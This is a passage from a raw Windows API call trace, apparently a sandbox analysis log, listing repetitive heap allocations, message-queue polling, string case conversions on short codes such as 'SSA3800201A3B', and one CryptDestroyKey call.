Size=0x10) returned 0x34aa4a8 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.534] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.534] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0164.534] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0164.534] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0164.534] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.535] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0164.535] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.535] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0164.535] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0164.535] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0164.535] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0164.535] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.535] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0164.536] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.536] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.536] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.536] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0164.536] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.536] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.536] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0164.537] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.537] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.537] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0164.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.540] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.540] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.541] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.543] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.543] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.543] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0164.543] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.543] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0164.544] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.544] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0164.544] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.544] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.544] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.544] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0164.544] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.544] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.545] CryptDestroyKey (hKey=0xaa5660) returned 1 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0164.545] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0164.545] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0164.545] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0164.545] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0164.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.546] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0164.546] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.546] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0164.546] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0164.546] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0164.546] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0164.546] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0164.546] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0164.547] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0164.547] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0164.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.547] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.547] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0164.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.547] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.547] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0164.547] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0164.547] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.547] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0164.547] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.547] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0164.548] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.548] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0164.548] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.548] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0164.548] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.548] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.548] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0164.548] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.548] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0164.548] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.548] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.548] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.548] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.548] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.548] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.548] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.548] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.549] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.549] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.549] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.549] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.549] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.549] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.549] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.549] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0164.549] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.549] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0164.549] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.549] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 